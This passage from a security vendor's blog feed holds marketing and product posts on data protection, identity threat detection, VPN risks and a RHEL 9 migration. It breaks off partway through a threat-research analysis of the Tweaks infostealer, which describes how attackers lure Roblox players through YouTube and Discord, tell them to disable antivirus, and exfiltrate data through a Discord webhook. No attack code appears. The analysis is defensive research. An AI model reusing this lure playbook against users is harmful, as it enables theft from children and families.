the power of AI, register for our innovation launch, The First AI Data Security Platform. Wed, 27 Mar 2024 11:54:38 -0700 Will Seaton https://www.zscaler.com/blogs/security-research/new-ai-insights-explore-key-ai-trends-and-risks-threatlabz-2024-ai-security https://www.zscaler.com/blogs/product-insights/best-medicine-healthcare-data-integrated-dlp You could argue that the challenges of securing medical data are more imposing than those of securing any other form of data. Electronic health records (EHR) are often transferred and shared between providers on a regular basis, and these records contain personal, in-depth patient data. These transfers put protected health information (PHI) at high risk as it moves from location to location. Additionally, the stringent regulations and compliance requirements for PHI force providers to learn how to construct the best data protection strategy for their needs—although this has been a necessary evil for some time now. To this end, our friends within the Health Information Management Working Group at CSA have put together a great discussion on the task of securing patient data and development of best practices. For providers looking for guidance from an expert that’s made the data protection journey, this content can be extremely valuable: Cloud Security Alliance Working Group: Health Information ManagementResearch Publication: Data Loss Prevention in healthcare One of the main topics of this publication is the architecture from which you should deliver data loss prevention (DLP) and data protection. While it’s important to understand best practices on how to implement data protection in the healthcare industry, it’s also valuable to know what the right architecture for a unified data protection platform should look like. With that, let's read a few paragraphs on how Gartner defines Security Service Edge and how it can help providers deliver better protection for data in motion and at rest. Securing Data In Motion In the medical and health industries, protecting sensitive data during transit is crucial. With the increasing reliance on digital platforms and the internet, organizations often face the challenge of safeguarding data over untrusted networks. The core building block for securing this sensitive data is DLP. Inline DLP combined with SSL inspection enables sensitive data in transit to be identified and classified. This ensures that data leaks to the internet or via email are prevented, maintaining the confidentiality of patient information. To this end, inline visibility into cloud apps such as electronic health record systems is also essential. By leveraging inline CASB technology, organizations can detect shadow IT and block risky apps, ensuring data security without hindering the use of critical cloud applications. In the healthcare industry, the use of personal devices by medical professionals and contractors poses a unique challenge. Implementing browser isolation technology allows for seamless data access on personal devices that doesn’t compromise their security. By hosting browser sessions in a secure cloud environment, sensitive data remains protected, even on unmanaged devices. Better yet, users get the specialized power of a purpose-built enterprise browser, only when needed, without having to change which browser they use. Perhaps the biggest benefit of SSE is that all of these unique features are integrated into a centralized, cloud-delivered platform. When hosted via the cloud, DLP is not only easier to deploy, but also more accurate in detection. Rather than dealing with multiple policies that could trigger differently and at different times, SSE gives you a singular view across your landscape, so decisions can be made on a holistic basis. Securing Data at Rest In the Medical Industry When it comes to securing medical data at rest, it’s worth learning and remembering a few key capabilities that have helped healthcare organizations do so with greater ease: SaaS Data Security lets you prioritize securing sensitive data in SaaS platforms, as it can be easily shared in risky ways. To prevent this, providers often consider adding CASB to their data protection strategy. By using a CASB that leverages the same DLP policy used for data at rest as that in motion, you can reduce alert fatigue and streamline response times. Since DLP engines will trigger the same to data inline and at rest in SaaS, visibility becomes consistent across channels. This is one of the main advantages of standardizing across a Security Service Edge architecture. SaaS Security Posture Management (SSPM) helps to identify and address misconfigurations in SaaS platforms, such as enabling multifactor authentication and closing risky open shares. Look for SSPM platforms that align with compliance frameworks like NIST or HIPAA to establish and maintain the required security posture. SaaS Supply Chain Security helps address the risks associated with third-party applications that may connect into your SaaS Platforms. You can scan SaaS platforms for risky connections from third-party applications that may have known vulnerabilities or allow unauthorized access to sensitive medical data. You’ll then get guidance on how to revoke these connections to ensure data hygiene and maintain a strong posture overall. . Endpoint DLP protects sensitive data stored on endpoints such as removable media or employee devices. Implement endpoint DLP with a unified agent that works alongside an SSE platform and enforces a unified DLP policy through inline inspection. This helps prevent data leaks and ensures the security of patient information. A word on Zscaler and shared workstation security: Securing data on shared workstations can sometimes be a challenge as implementing and managing user-level policy controls across multiple logins on a single device is often difficult to do. Zscaler integrates with the Imprivata Digital Identity platform allowing providers to easily support these multi-user workstation environments. Clinicians can easily and securely authenticate in and out of devices and only access applications for which they’ve been authorized. Bringing it All Together Unifying data protection into one platform is extremely powerful and can drastically simplify how you secure data. When delivered from an always-on cloud, you get one single DLP policy that follows users everywhere as well as consistent alerting, no matter where data is located. It’s helpful to gain a variety of perspectives on how to secure data, especially when it comes to a task as tricky as protecting medical data. While there are a multitude of different approaches to this task, understanding best practices can make all the difference for providers looking to begin their journey. All of this said, building the right architecture is equally important. If you’re interested in learning more about Security Service Edge and how Zscaler can help you secure your patient data, we’re here to chat or show you a demo. Photo Credit: Image by https://www.freepik.com/free-photo/medical-banner-with-doctor-working-laptop_30555907.htm Tue, 26 Mar 2024 05:33:13 -0700 Tamer Baker https://www.zscaler.com/blogs/product-insights/best-medicine-healthcare-data-integrated-dlp https://www.zscaler.com/blogs/product-insights/protecting-identity-becomes-pivotal-stopping-cyberattacks As today’s workplace transforms, data is no longer centralised and is spread across cloud, increasing the attack surface. Attackers are constantly looking for vulnerabilities to exploit and searching for the Achilles heel in identity systems that could deliver them entry into your IT environment. Cyber actors are now using sophisticated methods to target Identity and access management infrastructure. Credential misuse is the most common attack method. According to Gartner, “Modern attacks have shown that identity hygiene is not enough to prevent breaches. Multifactor authentication and entitlement management can be circumvented, and they lack mechanisms for detection and response if something goes wrong.” Prioritize securing identity infrastructure with tools to monitor identity attack techniques, protect identity and access controls, detect when attacks are occurring, and enable fast remediation. Zscaler ITDR detects credential theft and privilege misuse, attacks on Active Directory, and risky entitlements that create attack paths With identity-based attacks on the rise, today’s businesses require the ability to detect when attackers exploit, misuse, or steal enterprise identities. Identifying and detecting identity-based threats is now crucial due to attackers' propensity of using credentials and Active Directory (AD) exploitation techniques for privilege escalations and for lateral movement across your environment. Zscaler ITDR helps you to thwart identity-based AD attacks in real-time and help you to gain actionable insight into gaps in your identity attack surface. The solution enables you to continuously monitor identities, provides visibility on misconfigurations/ risky permissions and detect identity-based attacks such as credential theft, multifactor authentication bypass, and privilege escalation. Gain Full Visibility Uncover blind spots and understand hidden vulnerabilities that leave your environment susceptible to identity-based attacks such as exposed surfaces, dormant credentials, and policy violations. Real-Time Identity Threat Detection and Response Zscaler Identity Protection uses identity threat detections and decoys that rise high fidelity alerts to help your security teams to swiftly remediate with targeted response. The same endpoint agent that runs deception also detects identity attacks on the endpoint. These include advanced attacks like DCSync, DCShadow, LDAP enumeration, session enumeration, Kerberoast attacks, and more. Reduce Identity Risk With deep visibility on identity context, Zscaler Identity Protection helps your security teams to identify, address, and purge compromised systems and exposed credentials quickly. Often, security teams struggle to collect context and correlations to investigate threats. Zscaler ITDR solves this problem by consolidating all risk signals, threats detected, failed posture checks , Okta metadata, and policy blocks (ZIA/ZPA) into a single view for each identity. You can now quickly investigate risky identities for indicators of compromise and potential exploitation. Prevent Credential Misuse/Theft Attackers use stolen credentials and attack Active Directory to escalate privileges to move laterally. Zscaler Identity Protection helps to detect credential exploits and prevent credential theft or misuse. Spot Lateral Movement Stop attackers who have gotten past perimeter-based defenses and are attempting to move laterally through your environment. Zscaler Deception ITDR enhances security by identifying misconfigurations and credential exposures that create attack paths for attackers to use for lateral movement. Zscaler ITDR: Beyond just prevention – Monitor, detect, & respond to identity threats Monitor: Identity systems are in constant flux with configuration and permissions changes. Get alerts when configuration changes introduce new risks. Organizations lack visibility into credential sprawl across their endpoint footprint, leaving them vulnerable to attackers who exploit these credentials to access sensitive data and apps. The solution is Zscaler ITDR, which audits all endpoints to identify credentials and other sensitive material in various sources such as files, registry, memory, cache, configuration files, credential managers, and browsers and gains visibility into endpoint credential exposure to identify lateral movement paths, enforcing policies, and cleaning up credentials to reduce the internal attack surface. Detect: ITDR automatically surfaces hidden risks that might otherwise slip through the cracks. Zscaler ITDR pulls together all risk signals, threats detected, posture checks failed, metadata from Okta, and policy blocks from ZIA/ZPA into a single unified view to provide a complete picture of risk for an identity. This helps to identify & detect unmanaged identities, misconfigured settings, and even credential misuse. Respond: ITDR spots attacks targeting your identity store, you can take immediate action. Restrict or terminate those identities causing trouble and shut down threats before they have a chance to wreak havoc. Zscaler ITDR Benefits Minimize the Attack Surface Reduce attack surface by gaining continuous visibility into the attack vectors and identity misconfigurations. Identify to stop adversarial advances—including ransomware attacks—in their tracks with traps set. Real-Time Identity Threat Detection Thwart sophisticated attacks on Active Directory using identity threat detections on endpoints. Accelerate Incident Response Built-in threat detection and response speeds up threat detections and expands coverage to significantly reduce mean time to response (MTTR). ITDR helps security teams drive down their mean time to respond and prioritize what matters most by risk scoring. Conclusion No matter what – Breaches are inevitable, and preventative security measures aren’t sufficient to thwart them. Though staying upbeat while fighting cyberthreats, shrinking budgets, and staff turnover is a tall task, how we respond today dictates how we perform tomorrow. Choosing and adopting identity protection solutions like ITDR helps your company evolve its zero trust security and compliance posture in response to the changing threat landscape. Zscaler ITDR strengthens your zero trust posture by mitigating the risks of user compromise and privilege exploitation. Fri, 22 Mar 2024 02:39:16 -0700 Nagesh Swamy https://www.zscaler.com/blogs/product-insights/protecting-identity-becomes-pivotal-stopping-cyberattacks https://www.zscaler.com/blogs/product-insights/eliminate-risky-attack-surfaces Many moons ago, when the world wide web was young and the nerd in me was strong, I remember building a PC and setting it up as a web server. In those exciting, pioneering days, it was quite something to be able to have my very own IP address on the internet and serve my own web pages directly from my Apache server to the world. Great fun. I also remember looking at the server logs in horror as I scrolled through pages upon pages of failed login, and presumably hacking, attempts. I’d buttoned things up pretty nicely from a security standpoint, but even so, it would only have taken a vulnerability in an unpatched piece of software for a breach to occur, and from there, all bets would have been off. Even today, many internet service providers will let you provision your own server, should you feel brave enough. Of course, the stakes were not high for me at home, but knowing what we know now about the growth of ransomware attacks and how AI is facilitating them, no organization would dare do such a thing in 2024. Back then, I’d created an obvious and open attack surface. Tools were (and still are) readily available to scan IP address ranges on any network and identify open ports. In my case, ports 22, 80 and 443 were open to serve web pages and enable me to administer my server remotely. Every open port is a potential conduit into the heart of the hosting device, and so these should be eliminated where possible. Open ports, VPNs, and business Since online remote working became a real possibility in the early 2000s, organizations have tried to protect themselves and their employees by adopting VPN technology to encrypt traffic between a remote device and a VPN concentrator at the head office, allowing employees access to services like email, file and print servers. Even when these services became cloud-based solutions like Gmail and DropBox, many organizations pulled that traffic across a VPN to apply IT access policies. Not only did this often lead to an inefficient path from a remote worker to their applications, it also presented a serious security risk. As the performance and dependability of the internet grew, we also saw the advent of site-to-site VPNs, which made for an attractive alternative to far more expensive circuit-based connections that had been so prevalent such as MPLS. A vast number of organizations continue to rely on a virtual wide area network (WAN) built on top of VPNs. Unfortunately, as the old saying goes, there’s no such thing as a free lunch. Every VPN client or site using the internet as its backbone needs an IP address to connect to, an open port to connect through, and, well, you can see where this is going. Not every VPN solution has an active flaw, just as—luckily—my Apache server didn’t at the time I was running it. That said, software is fallible, and history has demonstrated this fact in numerous instances in which vulnerabilities are discovered and exploited in VPN products. Just last month, a fatal flaw was discovered in Ivanti’s VPN services, leaving thousands of users and organizations open to attack. Hackers are scouring day and night for vulnerabilities like these to exploit—and AI is only making their lives easier. “without proper configuration, patch management, and hardening, VPNs are vulnerable to attack” from Securing IPsec Virtual Private Networks by the National Security Agency (NSA) Zscaler is different The Zscaler Zero Trust Exchange™ works in a fundamentally different way—no VPN is required to securely connect. Instead, connections via the internet (or even from within a managed network) are policed on multiple levels. An agent on your device creates a TLS tunnel to the Zscaler cloud, which accepts connections only from known tenants (or Zscaler customers). This tunnel is mutually authenticated and encrypted between the agent and the Zscaler cloud. The individual and their device(s) must additionally be identified as part of the process. In short, it’s not possible to simply make a TLS connection to Zscaler. Once an approved user from a known customer with a recognized device connects to Zscaler, they’re still prevented from moving laterally over the network, as is the case with VPNs. With Zscaler, there is no IP range to which the user has access. Instead, every connection attempt has to be authorized, following the principles of zero trust. A user has access only to the applications for which they’ve been authorized. With this framework, even if an organization were to be successfully attacked, the blast radius would be limited. The same cannot be said for network-based security. Here’s the bottom line: VPNs and the firewalls behind them served us well for a long time, but the challenges that come with maintaining a security posture built on these legacy technologies are so great that it’s now a material business risk to use them. You need only to turn the news on for a few minutes to be reminded of this. Networks were built fundamentally to enable connectivity, and adding security to these networks is an uphill battle of putting the right obstacles in the way of that connectivity. This is why more and more public bodies and private organizations are turning this idea on its head and embracing a zero trust architecture that provides access for only an approved entity, on an approved device, to the applications to which they are entitled. At Zscaler we have built tools to help you assess the potential risk your own organization faces, some of which are free to access. Test your own defenses by visiting https://www.zscaler.com/tools/security-assessment and when you’re ready to learn more, get in touch! Tue, 02 Apr 2024 01:00:01 -0700 Simon Tompson https://www.zscaler.com/blogs/product-insights/eliminate-risky-attack-surfaces https://www.zscaler.com/blogs/product-insights/break-free-appliance-based-secure-web-gateway-swg The way we work today is vastly different from a few years ago. McKinsey & Company’s State of Organization 2023 report identified that before the COVID-19 pandemic, most organizations expected employees to spend more than 80% of their time in-office. But as of 2023, says the report, 90% of employees have embraced hybrid models, allowing them to work from home or other locations some (if not most) of the time. On a similar note, applications previously hosted in on-premises data centers are increasingly moving to the cloud. Gartner predicted that SaaS application spending would grow 17.9% to total $197 billion in 2023. With employees and apps both migrating off-premises, security controls logically must do the same. It’s no exaggeration to state that cloud and mobility have broken the legacy way of approaching security—so why should the castle-and-moat security approach, heavily reliant on hardware such as appliance-based proxies/SWGs, still exist? Users need fast, reliable, secure connectivity to the internet and cloud apps, with the flexibility to connect and work from anywhere. However, traditional SWGs have certain limitations, leading to security challenges, poor user experience, constant maintenance, and scalability issues. Let’s take a look at why it’s time to break free from appliance-based SWG. Security challengesIn December 2013, the Google Transparency Report showed just 48% of World Wide Web traffic was encrypted. Today, the same report shows at least 95% of traffic is encrypted. So, it’s no surprise that the Zscaler ThreatLabz 2023 State of Encrypted Attacks report showed 85.9% of threats—malware payloads, phishing scams, ad spyware sites, sensitive data leaks, and more—are now delivered over encrypted channels. While most organizations have some form of protection against malware, attackers are evolving their techniques, creating new variants able to bypass reputation-based detection technologies. As threat actors increasingly rely on encrypted channels, it’s more crucial than ever to inspect 100% of TLS/SSL traffic. This is the biggest way appliance-based proxies weigh down organizations: most SWG appliances lack the capacity to perform 100% inspection. Our 2023 State of Encrypted Attacks report surveyed 284 IT, security, and networking professionals and found that they mainly use legacy tools like web application firewalls and network-layer firewalls to scan traffic. However, respondents agreed that complexity, cost, and performance degradation are the biggest barriers to inspecting all TLS/SSL traffic. Furthermore, certain regulations require different policies for distinct data types, making inspection an arduous task. Poor user experienceCompared to only a few years ago, the meaning of “fast” is very different for today’s internet users. Instant access and connectivity has become the norm at home. Employees juxtapose the great digital experience in their personal lives with poor connectivity and performance issues that plague their digital work lives. Appliance-based SWGs are among the main culprits of poor user experience because they can’t scale quickly to handle traffic surges, and they require traffic to be backhauled to a central data center, leading to high latency and lost productivity for users trying to access the internet or SaaS applications. And all this inevitably affects revenue. Maintenance and scalability issuesApart from complexity and tedious management, other challenges of appliance-based SWGs are maintenance and scalability issues. To account for traffic surges and future growth, security teams are forced to overprovision, leading to expensive appliances sitting unused. At other times, they may need to wait multiple months for appliances/upgrades to arrive. With appliance-based SWG, security teams are always spread too thin, having to constantly update SWGs to account for changes to the organization and/or the threat landscape. The Zscaler differenceOvercome the limitations of appliance-based SWG with Zscaler. Better security: Inspect 100% of TLS/SSL traffic to find and stop threats—86% of which are delivered over encrypted channels. Better user experience: Stop backhauling internet/SaaS traffic with AI-powered Zscaler SWG, delivered from 150+ points of presence worldwide–close to your users and their cloud destinations for lower latency. No hardware to maintain: Move to a cloud native proxy architecture and eliminate the hardware headaches of maintenance, updates, patches, and upgrades. Platform approach: Extend comprehensive security functions, such as cloud firewall, sandbox, CASB, and data loss prevention, as well as end-to-end experience monitoring from a single unified platform and agent. If you’d like to know more about the reasons to break free from appliance-based proxies, check out this on-demand webinar. Wed, 20 Mar 2024 07:04:23 -0700 Apoorva Ravikrishnan https://www.zscaler.com/blogs/product-insights/break-free-appliance-based-secure-web-gateway-swg https://www.zscaler.com/blogs/company-news/mobile-world-congress-shows-a-vision-of-even-more-connected-things I approached this year’s Mobile World Congress as I usually would – with a very open mind. However, this year was different. It was far more fulfilling than previous years and, in some ways, had me feeling overwhelmed. Not so much by the sheer distances walked each day (approximately 20 kilometers) but by the types of discussions about the state of the telco industry and its future directions that were both enlightening and refreshing. For the first time I had the feeling that 5G will reach new milestones this year based on the various innovations that were on show. Telco networks need to seize opportunities Network operators globally are shaping their future, with MWC serving as the perfect moment to come together and discuss perspectives and the various opportunities that need to be recognised. Within this, what they can offer with regards to insights into data streams and providing additional overlays or security services on top to make their services more valuable and stick for customers were some of the key focus points. More important, however, is the growing opportunity to be more connected than ever before, offering the maximum potential of interconnectivity. Thanks to this, there is a clear opportunity for collaboration and the critical next steps that will define the future of telco networks for years to come. For this to happen, however, telcos must start seeing the value of their infrastructure. Similarities can be drawn with parallel industries, take banking for example. The SWIFT network is critical for international money transfers. While this network is great, there was a demand from consumers to have a faster, simpler network to move money. Given this, the financial industry has complied with more agile alternatives such as the VENMO, PayPal, and intra bank networks to deliver high speed financial transactions. These additional services are what drive adoption and value add to financial networks. Telcos, however, risk falling into two traps: Becoming a network provider to simply move data traffic or expanding their offerings by bundling additional services, such as partnering with Netflix as part of an entertainment package at no extra charge. So far in Telco we haven’t seen a level of innovation within its services that will lead to the additional demand for and consumption of said services. This is where true innovation will happen in the near future. Optimisations are required between every single network and service operator that is delivering and or creating content. In the age of AI, the level of data and measurement that can be consumed to ensure the best sets of services must be leveraged. From understanding how to best compress a video file through to moving and allowing disparate edge computing usage. All of this is to be delivered through intelligent insights. A few companies have the foresight to realise that they must start looking into the contextual aspects of interconnectivity. It is more important to figure out why a specific device is connected on a specific network, when thousands of devices are making connections every second. Telco providers need to find a way to bucket this information to orchestrate the data streams effectively and deliver on the value of the data that is created. My key takeaways from the show are: SIMS are literally everywhere From facilitating seamless communication between devices to enabling groundbreaking technologies, the versatility and adaptability of SIM cards are redefining the boundaries of connectivity. E-SIMS will allow organisations to provide country-specific access to data that travels with the user. The question that pops into my head is how these data streams will be secured in the future? 5G is real 5G is no longer a theory only, even in Europe. While we still don’t have the proper standalone 5Gs in Europe, private 5G has matured to be widely accepted and used. We were always waiting for the killer app in previous years and speculating about the virtual reality goggles occupying this space. More and more applications are demonstrating the potential of virtual worlds this year, e.g., for training purposes. Data sovereignty is a driving force Given our fragile global situation, the topic of data sovereignty has been getting more attention. Organisations and governments alike want to be able to take active control of the locations of their data, and not only data resilience. The debate steered by NIS2 and new security measurements for national critical infrastructures ties into this data sovereignty, software, and cloud ecosystems as well. Moving forward, the focus will be on connectivity being delivered everywhere now that almost everything is SIM enabled. There will also be questions around how telcos will make use of all the available information, and perhaps more importantly, how they can orchestrate it in one environment and deliver effective controls. The great unifier is security – every user, company, and service demands uniform security on any network. Zscaler as the world’s largest cloud security service, available everywhere, is in a poignant situation to deliver this glue. Wed, 20 Mar 2024 04:06:08 -0700 Nathan Howe https://www.zscaler.com/blogs/company-news/mobile-world-congress-shows-a-vision-of-even-more-connected-things https://www.zscaler.com/blogs/product-insights/2024-zscaler-public-sector-summit-washington-dc In March 2023 Zscaler held its inaugural Public Sector Summit, bringing together over 500 government and industry leaders to separate zero trust fact from fiction. The exchange last year was enlightening and energizing! We captured highlights from the event in an eBook, The Power of Zero Trust, including the challenges agencies are facing, some of our best practices for developing a robust zero trust architecture, and a use case demonstrating how zero trust can integrate into every part of your agency’s operations. As we prepare for the 2024 Public Sector Summit on April 4th, I am excited that this year’s line up will be bigger and even more engaging. With more than 22 guest speakers from across government, education and private sector, the audience will hear top of mind topics and discuss current threats and challenges facing agencies and the supporting community such as AI, funding zero trust initiatives, safeguarding critical infrastructure, SD-WAN and much more. Distinguished Speakers The power of the public sector community is in the forward-thinking individuals across agencies who have dedicated their careers to transforming our nation securely. We’ve built a program for the day with a stellar lineup of speakers including: Dr. Kelly Fletcher, CIO Department of State, Luis Coronado, CIO State Consular Affairs, and Eric Hysen, CIO/Chief AI Officer Department of Homeland Security will join Zscaler CEO Jay Chaudhry during his keynote. Chris DeRusha, Federal CISO and Deputy National Cyber Director, OMB. Panel on resources to fuel government modernization with Jessie Posilkin, Technical Lead at Technology Modernization Fund, Maria Roat of MA Consulting and Eric Mill of GSA. Suneel Cherukuri, CISO, DC Government Zach Benz, Sr. Mgr for Cyber Operations/DCISO with Sandia National Laboratories to talk about AI/ML. Panel discussing zero trust implementations with Gerald Caron, CIO, ITA/Commerce, Dan Han, CISO of VCU, Bob Costello, CISO of CISA and Dr. Gregory Edwards, CISO of FEMA. DoD leaders including Winston Beauchamp, DCISO with the Department of Air Force and General Les Call, Director of Zero Trust portfolio management office. Systems Integrator panel with Justin DePalmo, CISO and VP of IT at GDIT and Bob Ritchie, SVP & CTO at SAIC. Nelson Sims, Cyber Architect, DC Water and Dustin Glover, Chief Cyber Officer, State of Louisiana to discuss securing critical infrastructure. From Revolution to Evolution Our CEO and founder, Jay Chaudhry, will keynote the event setting the stage with his perspective on the zero trust revolution that began over a decade ago, and how that has now surpassed the tipping point in adoption thanks to the dedication of IT leaders across government.. He will be joined on stage by Dr. Fletcher, Luis Coronado and Eric Hysen and followed by many more innovators within the public sector speaking to a number of current cybersecurity issues including: Using AI to combat AI-based threats OMB’s perspective on the state of zero trust Unlocking resources to continue modernizing How agency leaders are taking the next steps in their zero trust implementations New innovations in predictive cybersecurity to identify and resolve vulnerabilities View the full agenda here to see the range of topics to be addressed during this year’s summit. Hands-On Zero Trust In addition to the informative sessions, we will also have hands-on solution stations this year for attendees to dive deeper into areas including: From Zero Access to Zero Trust in 10 Minutes: A joint solution with our integration partners AWS, Okta, and CrowdStrike Your Network Transformed: Zero trust for cloud and branch TheatLabz: Global Internet threat insights from Zscaler's research team CMMC: Empowered by zero trust Customer Success Center Zscaler Digital Experience We’re excited to welcome the public sector community in-person for a full day of learning, networking and experiences from the most forward-thinking Government IT leaders. Register today to learn more on how you can Simply, Secure and Transform your agency. Space is limited for this live event so we’ll be in touch to confirm your invitation. There is no charge for the event. Tue, 19 Mar 2024 08:03:31 -0700 Peter Amirkhan https://www.zscaler.com/blogs/product-insights/2024-zscaler-public-sector-summit-washington-dc https://www.zscaler.com/blogs/product-insights/zscaler-selects-red-hat-enterprise-linux-9-rhel-9-next-gen-private-access What’s new?On June 30, CentOS 7 will reach end of life, requiring migrations in many software stacks and server environments. In advance of this, Zscaler has selected Red Hat Enterprise Linux 9 as the next-generation operating system for Zscaler Private AccessTM (ZPA). RHEL 9 is the modern enterprise equivalent to CentOS 7, backed by Red Hat, and supported through 2032. This continues ZPA’s proven stability and resiliency on open source Linux platforms and builds on 10 years of maturity on Red Hat Enterprise Linux-based derivatives. What’s more, this transition can be done with no impact to operations or user access. When will it be released?Pre-built images for all ZPA-supported platforms are targeted for release in May 2024. All ZPA images, including containers, hypervisors, and public cloud offerings, will be replaced with RHEL 9. This is the recommended deployment for all future App Connector and Private Service Edge components, and customers should begin migration immediately on release. For customers that manage their own Red Hat base images, Zscaler is targeting the end of April 2024 for release of RHEL 9-native Red Hat Package Manager (RPM) and repositories. New Enterprise OS Without Licensing FeesTo ensure an excellent experience for our customers, Zscaler will provide operating system licenses for all RHEL 9 images on supported platforms. This continues our commitment to secure, open source platforms without imposing additional licensing costs on our customers. We also understand the need for control over security baseline images that meet your security posture and will continue to provide RPM options through support of RHEL 8 and RHEL 9. These software packages are bring-your-own-license (BYOL) and won’t conflict with any existing Red Hat enterprise license agreements you may hold. CentOS 7 End of LifeThe CentOS Project and Red Hat will be ending the final extended support for CentOS 7 and RHEL 7 on June 30, 2024. While we aim to provide RHEL 9 support in advance of this date (and do currently support RHEL 8 with RPMs), we recognize that the transition is a large undertaking, affecting all enterprise data centers, and operations and will take time to transition over to new operating systems and software. In light of this, we want to provide ample time to migrate while considering the security implications of continuing to support an obsolete operating system. Zscaler will support existing CentOS 7 deployments, RPMs, and distribution servers until December 24, 2024. We are confident our ZPA architecture and design uniquely position us to continue to support CentOS 7 past its expiry date. See End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x for more details on CentOS EOL and the ZPA white paper for architecture and security design. While we have ample controls in place and the utmost confidence, there is always inherent risk in using an unsupported server operating system. Zscaler will not provide backported operating system patches during this transition, but will maintain the ZPA software and supporting security libraries. Lightweight and Container Orchestration ReadyFollowing Zscaler’s cloud-native and best-in-class zero trust approach, ZPA infrastructure components are designed to be lightweight, container ready, and quickly deployed. This allows App Connector and Private Service Edge the benefit of being scaled and migrated without worry for previously deployed instances or operating system upgrade paths. For these reasons, the migration best practice is to deploy new App Connectors and Private Service Edges. Zscaler does not provide direct operating system upgrade paths for currently deployed infrastructure components. In further support of this, we offer Open Container Initiative (OCI) compatible images for Docker CE, Podman, and Red Hat OpenShift Platform. These images as well as the public cloud marketplaces are fully ready for autoscale groups, supporting quick scale up and scale down. Migration and Support ExcellenceZscaler understands your concerns and will fully support you throughout this transition process. Our Technical Account Managers, Support Engineers, and Professional Services are ready to address all concerns related to migration. If a temporary increase of App Connector or PSE limits are needed in your environment to complete migration, there will be no extra licensing costs. Below are the steps to help you replace CentOS 7 instances with RHEL 9. The enrollment and provisioning of new App Connectors and Private Service Edges can be automated in a few steps using Terraform (infrastructure-as-code) or Container Orchestration to simplify deployment further. App Connector Migration Steps:Create new App Connector Groups and provisioning keys for each location (Note: do not reuse existing provisioning keys as it will add the new RHEL 9 App Connectors to the old App Connector Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.) Update the App Connector group's version profile to "default - el9" so that it's able to receive the proper binary updates (This version profile can be set as default for the tenant once all connectors are moved to RHEL 9) Deploy new VMs using the upcoming RHEL 9 OVAs and newly created provisioning keys (templates can be used) Add the new App Connector Groups to each respective Server Group (Optional) In the UI, disable the app connector groups five minutes prior to the regional off-hours maintenance window to allow connections to gradually drain down During regional off-hours, remove the CentOS 7 App Connector Groups Private Service Edge Migration Steps:Create new Service Edge Groups and provisioning keys for each location (Note: do not reuse existing provisioning keys as it will add the new RHEL 9 PSEs to the old Service Edge Groups. Mixing different host OS and Zscaler software versions in a single group is not supported.) Update the Service Edge Group's version profile to "Default - el9" so that it's able to receive the proper binary updates (This version profile can be set as default for the tenant once all connectors and PSEs are moved to RHEL 9) Deploy new VMs using the upcoming RHEL 9 OVAs and the newly created provisioning keys (templates can be used) Add trusted networks and enable “publicly accessible” (if applicable) on the new Service Edge Groups (Optional) In the UI, disable the Service Edge Groups 15 minutes prior to the regional off-hours maintenance window to allow connections to gradually drain down During regional off hours, remove trusted networks and disable public access (if applicable) on CentOS 7 Service Edge Groups Please reach out to your respective support representatives for further assistance and information as needed. For more information: Zscaler Private Access Website Zscaler Private Access | Zero Trust Network Access (ZTNA) End-of-Support for CentOS 7.x, RHEL 7.x, and Oracle Linux 7.x ZPA App Connector Software by Platform ZPA Private Service Edge Software by Platform Mon, 18 Mar 2024 15:34:32 -0700 Shefali Chinni https://www.zscaler.com/blogs/product-insights/zscaler-selects-red-hat-enterprise-linux-9-rhel-9-next-gen-private-access https://www.zscaler.com/blogs/security-research/tweaks-stealer-targets-roblox-users-through-youtube-and-discord IntroductionZscaler’s ThreatLabz recently discovered a new campaign distributing an infostealer called Tweaks (aka Tweaker) that targets Roblox users. Attackers are exploiting popular platforms, like YouTube and Discord, to distribute Tweaks to Roblox users, capitalizing on the ability of legitimate platforms to evade detection by web filter block lists that typically block known malicious servers. Attackers share malicious files disguised as Frames Per Second (FPS) optimization packages with users and, in turn, users infect their own systems with Tweaks malware.Given that 45% of Roblox users are under 13, it’s probable that the malware being circulated could extend to parents’ systems. Furthermore, with the proliferation of remote work, there’s a possibility of this malware infiltrating corporate devices (surreptitiously) used by children of employees. Not only does a successful infection leave Roblox account data vulnerable, but it may also compromise the data and device.In this blog, we analyze the Tweaks attack campaign and its technical characteristics.Key TakeawaysThe Tweaks or Tweaker stealer masquerades as a tool to enhance frames per second (FPS) for Roblox users that steals data in the background without the user’s knowledge.The attackers leverage YouTube by enticing users to watch videos on "How to increase FPS" that contain links to their Discord groups. Once users join these groups, the attackers provide them with links to malicious files disguised as game tweaks and modifications.The stealer is Powershell-based and exfiltrates sensitive data like user information, location, Wi-Fi profiles, and passwords, Roblox IDs, and in-game currency details.Once sensitive data is obtained, it is sent via a Discord webhook to the attacker-controlled server. ThreatLabz researchers discovered multiple attackers copying a “free” version of Tweaks and using it to sell “paid” versions. BackgroundWhy is FPS appealing to Roblox users?The Roblox game boasts a massive user base consisting of millions of players worldwide. Roblox offers a diverse range of games and experiences, allowing players to explore virtual worlds and engage in various activities. One feature that attracts Roblox players is the desire for an enhanced gaming experience, including improved FPS. Higher FPS can result in smoother gameplay, making it an appealing prospect for players seeking optimal performance. It’s not unusual for gamers to download optimization tools from popular platforms like YouTube and Discord to increase their hardware performance – making it more likely that a gamer might unintentionally download the Tweaks malware.Gaming sees more cyber attacksRoblox's significant user base of 71.5 million daily active users makes it an attractive target for cyber attackers. In addition, a 2024 report shows that the gaming industry is now worth around $455.27 billion. In light of these trends, it is not surprising that hackers looking to exploit and monetize sensitive data are targeting Roblox users, who, like many other gamers, store a wealth of data in their gaming accountsCampaign AnalysisDuring our investigation, we discovered several YouTube channels and videos offering tutorials on how to improve FPS in Roblox. In these videos, Roblox players were instructed to disable their antivirus software to ensure the smooth operation of a “PC optimizer” without encountering any issues. In reality, this tactic is used to make a user’s system easier to infect with malware.In the description boxes of these videos, links to the attacker’s corresponding Discord groups are provided. Figure 1 below shows a Tweaks YouTube channel, the Discord group links provided to the user, and the initial Tweaks interface that appears when users download the initial file.Figure 1: An example of a Tweaks YouTube channel, links to Discord groups, and the Tweaks interface.Once they enter the attacker-controlled Discord channels, users encounter both free and paid versions of FPS optimization files. Our initial analysis revealed that both versions were identical, utilizing the same BAT file. Consequently, the choice between the free and paid versions had no impact on the outcome. The only distinction was that users who opted for the paid version experienced a small financial loss and had their data stolen.Presently, attackers entice new users by offering a free version with limited optimization features, alongside a paid version that promises more advanced optimization capabilities.Once users download the files, they unknowingly install the Tweaks malware, which not only infects their system but also puts their data at risk of being stolen. From the user's perspective, everything seems normal as the Tweaks malware genuinely enhances FPS optimization. This deceptive behavior makes users less suspicious of the malware since 